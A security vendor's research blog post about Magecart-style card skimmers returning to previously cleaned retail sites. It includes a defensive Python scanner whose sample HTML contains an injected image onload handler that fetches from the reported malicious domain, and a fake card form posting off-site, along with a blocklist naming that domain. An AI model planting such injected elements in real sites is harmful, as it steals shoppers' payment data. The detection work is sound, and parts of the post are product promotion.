Attackers strike unprotected sites – because cleanup alone is not enough – May 20, 2025
SOURCE DEFENSE RESEARCH INTELLIGENCE NEWS
The Source Defense Research team has identified a troubling pattern: attackers are returning to previously compromised sites—this time leveraging a brand-new domain, css.telechargent[.]com, that was still clean on VirusTotal and other blacklists at the time of detection. Because this domain had no prior association with malicious activity, it operated under the radar.
These reinfections didn’t happen because attackers were unusually persistent—they occurred because the affected sites never deployed client-side protection after the initial breach. And in some cases, they only protected “sensitive” pages like checkout—leaving other pages exposed. Removing malicious code is not enough; without behavioral detection and real-time defenses, attackers can (and do) return—often with new infrastructure that bypasses traditional safeguards.
Attack details
The current attack was identified across multiple websites, employing two distinct and unrelated methods:
Silent Skimming via Image Onload Event
The malicious script is triggered by an onload event on an image element, a subtle method that runs JavaScript code without any user interaction or visible change on the page.
This technique silently captures PCI and PII data during checkout processes and exfiltrates it without visual disruption.
This method was observed on several websites in the US.
Double-Entry Attack via Fake Payment Form
Similar to the previous attack, the malicious code presents a fake payment form to capture sensitive data.
The attack fakes a polished payment form before the legitimate payment page, making it highly convincing at the time of entry. While users may later realize something was wrong (after seeing a different legitimate payment form), by then it is too late—their credit card information has already been stolen.
Critically, this malicious form is injected from a non-sensitive webpage—outside the scope of standard page-specific protections. This demonstrates that securing only payment pages leaves exploitable gaps in the site.
Only the double-entry attack method was found active again on the UK retailer's website, while the silent skimming tactic was found targeting other sites.
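As an added illustration (not Source Defense's code), the following Python scanner checks a page's HTML for the two signals described above: inline onload/onerror handlers on elements such as images, and script, iframe, form or image references to hosts outside a site's allowlist. The allowlist, the second host and the sample HTML are constructed; the blocklist entry is the domain named in this post, and the sample shows why an allowlist catches a freshly rotated domain that a blocklist does not yet know.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Constructed policy: hosts this site legitimately loads code from or posts to.
ALLOWED_HOSTS = {"shop.example", "static.shop.example"}
# Hosts already reported as malicious; the entry below is the domain named in this post.
BLOCKLISTED_HOSTS = {"css.telechargent.com"}
EVENT_ATTRS = {"onload", "onerror"}          # handlers that fire with no user action
URL_ATTRS = {"script": "src", "iframe": "src", "form": "action", "img": "src"}
URL_RE = re.compile(r"https?://[^\s'\"()<>]+")

class SkimScanner(HTMLParser):
    """Collects (tag, attr, host, label) findings from one HTML document."""
    def __init__(self, allowed, blocklist):
        super().__init__()
        self.allowed, self.blocklist = allowed, blocklist
        self.findings = []

    def _check_host(self, tag, attr, url):
        host = urlparse(url).hostname
        if not host or host in self.allowed:
            return                              # allow-listed: nothing to report
        label = "known-bad" if host in self.blocklist else "unlisted"
        self.findings.append((tag, attr, host, label))

    def handle_starttag(self, tag, attrs):
        for attr, value in attrs:
            if value is None:
                continue
            attr = attr.lower()
            if attr in EVENT_ATTRS:
                # Inline handler on a tag such as <img>: runs on load, no click needed.
                self.findings.append((tag, attr, None, "inline-handler"))
                for url in URL_RE.findall(value):
                    self._check_host(tag, attr, url)
            elif URL_ATTRS.get(tag) == attr:
                self._check_host(tag, attr, value)

def scan_page(html, allowed=ALLOWED_HOSTS, blocklist=BLOCKLISTED_HOSTS):
    scanner = SkimScanner(allowed, blocklist)
    scanner.feed(html)
    return scanner.findings

# Constructed sample of a non-payment page: legitimate assets plus two injected elements.
SAMPLE_HTML = """<html><body>
<script src="https://static.shop.example/app.js"></script>
<img src="https://static.shop.example/logo.png" onload="fetch('https://css.telechargent.com/c')">
<form action="https://rotated-cdn.example/submit"><input name="cardnumber"></form>
</body></html>"""
```

Running scan_page(SAMPLE_HTML) reports the inline image handler, the known-bad host it contacts, and the form posting to a host that is not blocklisted but is also not on the allowlist.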
Ongoing evolution of the attack
This latest wave demonstrates two alarming trends:
Infrastructure Adaptation: Attackers are actively rotating to new, unlisted domains like css.telechargent[.]com to sidestep blacklist defenses.
Repeat Targeting: Once breached, a website remains a high-value target. Repeat attacks with updated methods are increasingly common.
Together, these underscore the need for continuous, real-time client-side monitoring and protection across the entire website—not one-time remediation.
How does Source Defense protect you from such attacks?
Source Defense provides proactive, always-on monitoring and prevention—stopping reinfection before it starts. Our Protect product automatically blocks malicious domains and prevents unauthorized behaviors across all website pages, not just the checkout.
Customers using our Detect product receive real-time alerts when suspicious behavior is detected, enabling them to take manual action. And for all customers, our Professional Services Team continuously monitors threat trends and proactively alerts those who might be impacted.
How will you be alerted?
When Source Defense detects such an attack, you will receive the following alerts:
New Script Identified: Unknown or suspicious script detected.
Loading from Blacklisted Domain: Detection of script sourced from a malicious domain.
Sending Data to Blacklisted Domain: Detection of data exfiltration attempts.
Accessing PII or PCI Data: Immediate alert for data access attempts.
These alerts will be visible in:
The Bell Notification Center.
The Dashboard Summary, highlighted in red.
The Found in Blacklists and Script Behaviors widgets.
Cleanup is not enough. Protection must be continuous and cover all website pages—not just checkout. Attacks today can start from anywhere: login, cart, search, or seemingly harmless pages. Reinfections prove that without comprehensive, client-side controls in place, the same vulnerabilities remain open to exploitation.